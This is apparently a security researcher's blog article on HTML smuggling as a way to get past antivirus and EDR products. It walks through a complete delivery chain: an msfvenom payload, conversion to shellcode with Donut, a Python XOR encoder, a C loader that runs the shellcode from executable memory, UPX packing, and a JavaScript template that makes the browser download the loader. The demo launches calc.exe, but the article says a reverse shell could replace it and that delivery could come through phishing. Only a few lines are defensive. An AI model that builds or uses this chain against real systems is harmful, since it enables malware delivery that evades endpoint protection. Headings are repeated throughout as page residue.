ARTICLES

What is HTML Smuggling?

HTML Smuggling leverages browsers’ built-in JavaScript capabilities to reconstruct binary files client-side. It circumvents traditional network protections since no file is transmitted directly.

What is HTML Smuggling?

HTML Smuggling leverages browsers’ built-in JavaScript capabilities to reconstruct binary files client-side. It circumvents traditional network protections since no file is transmitted directly.

What is HTML Smuggling?

HTML Smuggling leverages browsers’ built-in JavaScript capabilities to reconstruct binary files client-side. It circumvents traditional network protections since no file is transmitted directly.

This project demonstrates how to use HTML Smuggling as an evasion technique to bypass Antivirus (AV) and Endpoint Detection and Response (EDR) solutions. Originally presented at Leiria Tech Talks, this walkthrough covers payload generation, shellcode transformation, in-memory execution, and delivery via a web browser using HTML Smuggling techniques.

HTML Smuggling and EDR Bypass

Demo Goals

EDR evasion
In-memory execution of calc.exe
Delivery via malicious HTML

Demo Goals

EDR evasion
In-memory execution of calc.exe
Delivery via malicious HTML

Demo Goals

EDR evasion
In-memory execution of calc.exe
Delivery via malicious HTML

Step-by-Step Payload Construction

Generate Payload

Step-by-Step Payload Construction

Generate Payload

Step-by-Step Payload Construction

Generate Payload

msfvenom -p windows/exec CMD=calc.exe -f exe -o calc_payload.exe

Convert EXE to Shellcode using Donut

Convert EXE to Shellcode using Donut

Convert EXE to Shellcode using Donut

donut -i calc_payload.exe -f 1 -o donut_payload.bin -z 1 -e 3 -b 3

XOR Encode the Shellcode

XOR Encode the Shellcode

XOR Encode the Shellcode

with open("donut_payload.bin", "rb") as f:

data = bytearray(f.read())

key = 0xAA

encoded = bytearray([b ^ key for b in data])

with open("shellcode_xored.bin", "wb") as f:

f.write(encoded)

print(f"[+] Shellcode coded with XOR (key = 0x{key:02X}) saved as shellcode_xored.bin")

Convert Shellcode to C Header

Convert Shellcode to C Header

Convert Shellcode to C Header

xxd -i shellcode_xored.bin > shellcode.h

Build the Loader in C

Build the Loader in C

Build the Loader in C

#include <windows.h>

#include <stdio.h>

#include "shellcode.h"

unsigned char key = 0xAA;

int main() {

for (int i = 0; i < shellcode_xored_bin_len; i++)

shellcode_xored_bin[i] ^= key;

LPVOID exec = VirtualAlloc(0, shellcode_xored_bin_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (!exec) return -1;

memcpy(exec, shellcode_xored_bin, shellcode_xored_bin_len);

((void(*)())exec)();

return 0;

}

Compile Loader (Windows)

Compile Loader (Windows)

Compile Loader (Windows)

i686-w64-mingw32-gcc loader.c -o loader.exe -m32 -Os -s -fno-ident -Wno-write-strings

Compress with UPX

Compress with UPX

Compress with UPX

upx --ultra-brute loader.exe

Base64 Encode for HTML Embedding

Base64 Encode for HTML Embedding

Base64 Encode for HTML Embedding

base64 -w 0 loader.exe > loader

HTML Smuggling HTML Template

function base64ToArrayBuffer(base64) {

var binary_string = window.atob(base64);

var len = binary_string.length;

var bytes = new Uint8Array(len);

for (var i = 0; i < len; i++) {

bytes[i] = binary_string.charCodeAt(i);

}

return bytes.buffer;

}

var file = "YOUR_BASE64_HERE"; // Replace this with your base64-encoded loader

let blob = new Blob([base64ToArrayBuffer(file)]);

let a = document.createElement("a");

a.href = URL.createObjectURL(blob);

a.download = "loader.exe";

a.click();

</script>

The magic!

This is where the magic happens. As soon as the victim accesses the malicious URL (which, as discussed earlier in the article, could be delivered through multiple vectors — for this example, we’ll assume it was via phishing for simplicity), the loader is downloaded to the victim’s machine.

Once executed, it injects the shellcode — which, in this demonstration, simply launches the Windows calculator, but could just as easily be a reverse shell. The attack successfully bypasses Windows Defender, demonstrating an effective evasion of the built-in protection.

The magic!

Security Insights

Fully browser-based, bypassing traditional inspection layers.
Effective against modern EDR, ATP, firewalls, and proxies.
Best countered via behavioral and memory monitoring.

Security Insights

Fully browser-based, bypassing traditional inspection layers.
Effective against modern EDR, ATP, firewalls, and proxies.
Best countered via behavioral and memory monitoring.

Security Insights

Fully browser-based, bypassing traditional inspection layers.
Effective against modern EDR, ATP, firewalls, and proxies.
Best countered via behavioral and memory monitoring.

Conclusion

HTML Smuggling remains a powerful tactic in red team operations. Understanding its mechanics is key to building robust defensive strategies.

Feel free to check out this and other projects on my Github:
https://github.com/nullbyter19/xor-donut

Milton Araújo

Security Researcher

Milton Araújo

Security Researcher

Conclusion

HTML Smuggling remains a powerful tactic in red team operations. Understanding its mechanics is key to building robust defensive strategies.

Feel free to check out this and other projects on my Github:
https://github.com/nullbyter19/xor-donut

HTML Smuggling and EDR Bypass